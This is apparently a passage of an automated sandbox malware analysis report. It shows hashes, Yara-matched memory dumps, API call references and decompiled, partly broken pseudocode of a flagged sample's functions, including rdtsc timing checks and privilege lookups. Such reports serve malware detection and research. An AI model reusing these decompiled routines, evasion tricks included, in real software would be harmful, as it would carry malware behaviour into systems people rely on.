                                                                                                                                                                                    • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                    			E00089A90(intOrPtr* _a4) {
                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                    				char _v24;
                                                                                                                                                                                    				char _v284;
                                                                                                                                                                                    				char _v804;
                                                                                                                                                                                    				char _v840;
                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                    				intOrPtr* _t52;
                                                                                                                                                                                    				void* _t53;
                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                    				void* _t56;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t52 = _a4;
                                                                                                                                                                                    				_t39 = 0; // executed
                                                                                                                                                                                    				_t24 = E00087E80(_t52,  &_v24); // executed
                                                                                                                                                                                    				_t54 = _t53 + 8;
                                                                                                                                                                                    				if(_t24 != 0) {
                                                                                                                                                                                    					E00088090( &_v24,  &_v840);
                                                                                                                                                                                    					_t55 = _t54 + 8;
                                                                                                                                                                                    					do {
                                                                                                                                                                                    						E0009B9F0( &_v284, 0x104);
                                                                                                                                                                                    						E0009C060( &_v284,  &_v804);
                                                                                                                                                                                    						_t56 = _t55 + 0x10;
                                                                                                                                                                                    						_t50 = 0x4f;
                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                    							_t31 = E00094DD0(E00094D70(_t52, _t50),  &_v284);
                                                                                                                                                                                    							_t56 = _t56 + 0x10;
                                                                                                                                                                                    							if(_t31 != 0) {
                                                                                                                                                                                    								break;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							_t50 = _t50 + 1;
                                                                                                                                                                                    							if(_t50 <= 0x62) {
                                                                                                                                                                                    								continue;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    							}
                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t9 = _t52 + 0x14; // 0xffffe045
                                                                                                                                                                                    						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                                                                                                                                                    						_t39 = 1;
                                                                                                                                                                                    						L8:
                                                                                                                                                                                    						_t33 = E000880C0( &_v24,  &_v840);
                                                                                                                                                                                    						_t55 = _t56 + 8;
                                                                                                                                                                                    					} while (_t33 != 0 && _t39 == 0);
                                                                                                                                                                                    					_t34 = E00088140(_t52,  &_v24); // executed
                                                                                                                                                                                    					if(_t39 == 0) {
                                                                                                                                                                                    						asm("rdtsc");
                                                                                                                                                                                    						asm("rdtsc");
                                                                                                                                                                                    						_v8 = _t34 - 0 + _t34;
                                                                                                                                                                                    						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                                                                                                                                                    					_t20 = _t52 + 0x31; // 0x5608758b
                                                                                                                                                                                    					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                                                                                                                                                    					return 1;
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					return _t24;
                                                                                                                                                                                    				}
                                                                                                                                                                                    			}



















                                                                                                                                                                                    0x00089a9b
                                                                                                                                                                                    0x00089aa3
                                                                                                                                                                                    0x00089aa5
                                                                                                                                                                                    0x00089aaa
                                                                                                                                                                                    0x00089aaf
                                                                                                                                                                                    0x00089ac2
                                                                                                                                                                                    0x00089ac7
                                                                                                                                                                                    0x00089ad0
                                                                                                                                                                                    0x00089adc
                                                                                                                                                                                    0x00089aef
                                                                                                                                                                                    0x00089af4
                                                                                                                                                                                    0x00089af7
                                                                                                                                                                                    0x00089b00
                                                                                                                                                                                    0x00089b12
                                                                                                                                                                                    0x00089b17
                                                                                                                                                                                    0x00089b1c
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00089b1e
                                                                                                                                                                                    0x00089b22
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00089b24
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00089b22
                                                                                                                                                                                    0x00089b26
                                                                                                                                                                                    0x00089b29
                                                                                                                                                                                    0x00089b2f
                                                                                                                                                                                    0x00089b31
                                                                                                                                                                                    0x00089b3c
                                                                                                                                                                                    0x00089b41
                                                                                                                                                                                    0x00089b44
                                                                                                                                                                                    0x00089b51
                                                                                                                                                                                    0x00089b5c
                                                                                                                                                                                    0x00089b5e
                                                                                                                                                                                    0x00089b64
                                                                                                                                                                                    0x00089b68
                                                                                                                                                                                    0x00089b6b
                                                                                                                                                                                    0x00089b6b
                                                                                                                                                                                    0x00089b72
                                                                                                                                                                                    0x00089b75
                                                                                                                                                                                    0x00089b7a
                                                                                                                                                                                    0x00089b87
                                                                                                                                                                                    0x00089ab6
                                                                                                                                                                                    0x00089ab6
                                                                                                                                                                                    0x00089ab6

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140345965.0000000000080000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140373133.000000000009E000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140377394.000000000009F000.00000020.00000001.sdmp Download File
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 94a95035592f104ec3c15ee8249d18e6ab3370760d4349d6e373ae9f4d46536f
                                                                                                                                                                                    • Instruction ID: 1513165f469a619ed630fa7a86384ec0e1e51e4c9ebe5de628edfa5126872220
                                                                                                                                                                                    • Opcode Fuzzy Hash: 94a95035592f104ec3c15ee8249d18e6ab3370760d4349d6e373ae9f4d46536f
                                                                                                                                                                                    • Instruction Fuzzy Hash: B321EAB2D4021857CB25FA64AD42EFF73BCBB54314F48056DF98993142F734AA49CBA2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                    			E0009A242(signed int __eax, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                                                                                    				signed int _t10;
                                                                                                                                                                                    				char _t17;
                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                    				signed int _t35;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t10 = __eax & 0xd93f0f10;
                                                                                                                                                                                    				_t35 = _t10;
                                                                                                                                                                                    				if(_t35 < 0) {
                                                                                                                                                                                    					L5:
                                                                                                                                                                                    					asm("les edx, [edx+edx*2]"); // executed
                                                                                                                                                                                    					ExitProcess(??);
                                                                                                                                                                                    				}
                                                                                                                                                                                    				if(_t35 > 0) {
                                                                                                                                                                                    					 *_t10 =  *_t10 + _t10;
                                                                                                                                                                                    					E0009AB40(_t24, _t10, _t10 + 0xc7c, _t18, 0, 0x36);
                                                                                                                                                                                    					goto L5;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				asm("sbb esp, ebp");
                                                                                                                                                                                    				asm("fst dword [ebp-0x75]");
                                                                                                                                                                                    				_t14 = _a4;
                                                                                                                                                                                    				_push(_t25);
                                                                                                                                                                                    				_t3 = _t14 + 0xc74; // 0xc74
                                                                                                                                                                                    				E0009AB40(_t24, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                                                                                    				_t17 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                                                                                    				return _t17;
                                                                                                                                                                                    			}








                                                                                                                                                                                    0x0009a242
                                                                                                                                                                                    0x0009a242
                                                                                                                                                                                    0x0009a247
                                                                                                                                                                                    0x0009a2b5
                                                                                                                                                                                    0x0009a2b5
                                                                                                                                                                                    0x0009a2b8
                                                                                                                                                                                    0x0009a2b8
                                                                                                                                                                                    0x0009a249
                                                                                                                                                                                    0x0009a29a
                                                                                                                                                                                    0x0009a2aa
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0009a2b4
                                                                                                                                                                                    0x0009a24d
                                                                                                                                                                                    0x0009a24f
                                                                                                                                                                                    0x0009a253
                                                                                                                                                                                    0x0009a259
                                                                                                                                                                                    0x0009a25f
                                                                                                                                                                                    0x0009a267
                                                                                                                                                                                    0x0009a27d
                                                                                                                                                                                    0x0009a281

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00089CD3,?,?,00089CD3,00000060,00000000,00000000,?,?,00089CD3,?,00000000), ref: 0009A27D
                                                                                                                                                                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0009A2B8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140345965.0000000000080000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140373133.000000000009E000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140377394.000000000009F000.00000020.00000001.sdmp Download File
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExitFreeHeapProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1180424539-0
                                                                                                                                                                                    • Opcode ID: d83ee5fe9ca70de8768805da2ab8719825a1e5288c921b76b80169aaf11f5f44
                                                                                                                                                                                    • Instruction ID: cce6f42dd7cff2ddcfce302c7cc4eb124ac5c183958e509bcc88441977c262aa
                                                                                                                                                                                    • Opcode Fuzzy Hash: d83ee5fe9ca70de8768805da2ab8719825a1e5288c921b76b80169aaf11f5f44
                                                                                                                                                                                    • Instruction Fuzzy Hash: BD01AD752002046BDB24DF68CC46FD77768EF89350F118598F9189B253C631E915CAE0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 61%
                                                                                                                                                                                    			E000882E9(void* __eax, intOrPtr _a4, long _a8) {
                                                                                                                                                                                    				char _v67;
                                                                                                                                                                                    				char _v68;
                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                    				int _t14;
                                                                                                                                                                                    				long _t21;
                                                                                                                                                                                    				int _t26;
                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                    
                                                                                                                                                                                    				asm("scasb");
                                                                                                                                                                                    				_t36 = __eax - 0x73;
                                                                                                                                                                                    				0xec8b();
                                                                                                                                                                                    				_t29 = _t31;
                                                                                                                                                                                    				_v68 = 0;
                                                                                                                                                                                    				E0009BA40( &_v67, 0, 0x3f);
                                                                                                                                                                                    				E0009C5E0( &_v68, 3);
                                                                                                                                                                                    				_t13 = E0008ACD0(_t36, _a4 + 0x1c,  &_v68); // executed
                                                                                                                                                                                    				_t14 = E00094E30(_a4 + 0x1c, _t13, 0, 0, 0xc4e7b6d6);
                                                                                                                                                                                    				_t26 = _t14;
                                                                                                                                                                                    				if(_t26 != 0) {
                                                                                                                                                                                    					_t21 = _a8;
                                                                                                                                                                                    					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                                                                                                                                    					_t38 = _t14;
                                                                                                                                                                                    					if(_t14 == 0) {
                                                                                                                                                                                    						_t14 =  *_t26(_t21, 0x8003, _t29 + (E0008A460(_t38, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    				return _t14;
                                                                                                                                                                                    			}












                                                                                                                                                                                    0x000882e9
                                                                                                                                                                                    0x000882ea
                                                                                                                                                                                    0x000882ec
                                                                                                                                                                                    0x000882f1
                                                                                                                                                                                    0x000882ff
                                                                                                                                                                                    0x00088303
                                                                                                                                                                                    0x0008830e
                                                                                                                                                                                    0x0008831e
                                                                                                                                                                                    0x0008832e
                                                                                                                                                                                    0x00088333
                                                                                                                                                                                    0x0008833a
                                                                                                                                                                                    0x0008833d
                                                                                                                                                                                    0x0008834a
                                                                                                                                                                                    0x0008834c
                                                                                                                                                                                    0x0008834e
                                                                                                                                                                                    0x0008836b
                                                                                                                                                                                    0x0008836b
                                                                                                                                                                                    0x0008836d
                                                                                                                                                                                    0x00088372

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0008834A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140345965.0000000000080000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140373133.000000000009E000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140377394.000000000009F000.00000020.00000001.sdmp Download File
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                                                    • Opcode ID: b334ce733ac2f1affbfe645aba041c72c848df86295bf0cfdfa15ca7bfb968a4
                                                                                                                                                                                    • Instruction ID: 1e79c3790063b911d465fd9c60a9ec578084ccedaa48b38e170016ad80dffaa3
                                                                                                                                                                                    • Opcode Fuzzy Hash: b334ce733ac2f1affbfe645aba041c72c848df86295bf0cfdfa15ca7bfb968a4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A01D431A802287BFB20B6949C02FFE676CAB51F50F044019FA04BA1C2E6946A0657E6
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                    			E000882F0(intOrPtr _a4, long _a8) {
                                                                                                                                                                                    				char _v67;
                                                                                                                                                                                    				char _v68;
                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                    				intOrPtr* _t13;
                                                                                                                                                                                    				int _t14;
                                                                                                                                                                                    				long _t21;
                                                                                                                                                                                    				intOrPtr* _t25;
                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                    
                                                                                                                                                                                    				_v68 = 0;
                                                                                                                                                                                    				E0009BA40( &_v67, 0, 0x3f);
                                                                                                                                                                                    				E0009C5E0( &_v68, 3);
                                                                                                                                                                                    				_t12 = E0008ACD0(_t30, _a4 + 0x1c,  &_v68); // executed
                                                                                                                                                                                    				_t13 = E00094E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                                                                                                                                    				_t25 = _t13;
                                                                                                                                                                                    				if(_t25 != 0) {
                                                                                                                                                                                    					_t21 = _a8;
                                                                                                                                                                                    					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                                                                                                                                    					_t32 = _t14;
                                                                                                                                                                                    					if(_t14 == 0) {
                                                                                                                                                                                    						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0008A460(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                                                                                                                    					}
                                                                                                                                                                                    					return _t14;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				return _t13;
                                                                                                                                                                                    			}












                                                                                                                                                                                    0x000882ff
                                                                                                                                                                                    0x00088303
                                                                                                                                                                                    0x0008830e
                                                                                                                                                                                    0x0008831e
                                                                                                                                                                                    0x0008832e
                                                                                                                                                                                    0x00088333
                                                                                                                                                                                    0x0008833a
                                                                                                                                                                                    0x0008833d
                                                                                                                                                                                    0x0008834a
                                                                                                                                                                                    0x0008834c
                                                                                                                                                                                    0x0008834e
                                                                                                                                                                                    0x0008836b
                                                                                                                                                                                    0x0008836b
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0008836d
                                                                                                                                                                                    0x00088372

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0008834A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140345965.0000000000080000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140373133.000000000009E000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140377394.000000000009F000.00000020.00000001.sdmp Download File
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                                                    • Opcode ID: 95b370f24f99b5a39361c106b5e8564e57c1dd5b15c322762b8fa91e30cd9e30
                                                                                                                                                                                    • Instruction ID: 608330737ad957ecd85f190c28d935640708474b50e97d839cbdc29b43b192ae
                                                                                                                                                                                    • Opcode Fuzzy Hash: 95b370f24f99b5a39361c106b5e8564e57c1dd5b15c322762b8fa91e30cd9e30
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D018431A402287BEB21B6949C03FFE766C6B51F50F454115FF04BA1C2E6946A0657E6
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                    			E0009A282(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edi, void* _a12, void* _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40) {
                                                                                                                                                                                    				void* _v0;
                                                                                                                                                                                    				void* _v1;
                                                                                                                                                                                    				intOrPtr _t20;
                                                                                                                                                                                    
                                                                                                                                                                                    				asm("adc al, 0xd5");
                                                                                                                                                                                    				asm("in al, dx");
                                                                                                                                                                                    				_t1 = __ecx - 0x21;
                                                                                                                                                                                    				 *_t1 = __eax;
                                                                                                                                                                                    				 *__edi =  *__edi - 1;
                                                                                                                                                                                    				asm("adc ah, [esi]");
                                                                                                                                                                                    				_t20 =  *_t1;
                                                                                                                                                                                    				if ( *__edi != 0) goto L5;
                                                                                                                                                                                    			}






                                                                                                                                                                                    0x0009a282
                                                                                                                                                                                    0x0009a284
                                                                                                                                                                                    0x0009a285
                                                                                                                                                                                    0x0009a285
                                                                                                                                                                                    0x0009a289
                                                                                                                                                                                    0x0009a28b
                                                                                                                                                                                    0x0009a28d
                                                                                                                                                                                    0x0009a28f

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0009A2B8
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140345965.0000000000080000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140373133.000000000009E000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140377394.000000000009F000.00000020.00000001.sdmp Download File
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                                    • Opcode ID: fee2e47afc7fe3d6af03dd891c10b708d9f4b710f2278b52515bc07653925c3a
                                                                                                                                                                                    • Instruction ID: a08daef5b67e417727de2e0ed94d7655a03edd7900e59c63b88a7dc2385535ea
                                                                                                                                                                                    • Opcode Fuzzy Hash: fee2e47afc7fe3d6af03dd891c10b708d9f4b710f2278b52515bc07653925c3a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E0148B2204108AFDB15CF98DC84DE7B7ADEF9C310F148259FA4C9B242C631E811CBA0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0008F1B2,0008F1B2,0000003C,00000000,?,00089D45), ref: 0009A3E0
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140345965.0000000000080000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140373133.000000000009E000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140377394.000000000009F000.00000020.00000001.sdmp Download File
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                                                    • Opcode ID: 399d1204bbe8c9b9f3c69b2b173253ab537f8edd6a7fe52886625129781f74c9
                                                                                                                                                                                    • Instruction ID: e5d1eab6a378989c253d93596c15219ddacaa3a6fa70b5f69cc93e9bb151c2ac
                                                                                                                                                                                    • Opcode Fuzzy Hash: 399d1204bbe8c9b9f3c69b2b173253ab537f8edd6a7fe52886625129781f74c9
                                                                                                                                                                                    • Instruction Fuzzy Hash: A4F08CB66102146FDB10EF99CC86EE777ADEF49220F008455F9585B282C630B92586F1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                    			E0009A210(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                    
                                                                                                                                                                                    				E0009AB40(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                                                                                                                                    				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                                                                                                                                                    				return _t10;
                                                                                                                                                                                    			}





                                                                                                                                                                                    0x0009a227
                                                                                                                                                                                    0x0009a23d
                                                                                                                                                                                    0x0009a241

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00094516,?,00094C8F,00094C8F,?,00094516,?,?,?,?,?,00000000,00089CD3,?), ref: 0009A23D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140345965.0000000000080000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140373133.000000000009E000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140377394.000000000009F000.00000020.00000001.sdmp Download File
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                    • Instruction ID: 8ae9fe90af8b62020155305f83a61b9f5b81862126d39dff0908d8b257fd633d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 82E012B1200208ABDB14EF99CC41EA777ADAF88650F118558BA085B242C630F9108AF0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                    			E0009A250(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                                                                                    				char _t10;
                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t3 = _a4 + 0xc74; // 0xc74
                                                                                                                                                                                    				E0009AB40(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                                                                                    				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                                                                                    				return _t10;
                                                                                                                                                                                    			}





                                                                                                                                                                                    0x0009a25f
                                                                                                                                                                                    0x0009a267
                                                                                                                                                                                    0x0009a27d
                                                                                                                                                                                    0x0009a281

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00089CD3,?,?,00089CD3,00000060,00000000,00000000,?,?,00089CD3,?,00000000), ref: 0009A27D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140345965.0000000000080000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140373133.000000000009E000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140377394.000000000009F000.00000020.00000001.sdmp Download File
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
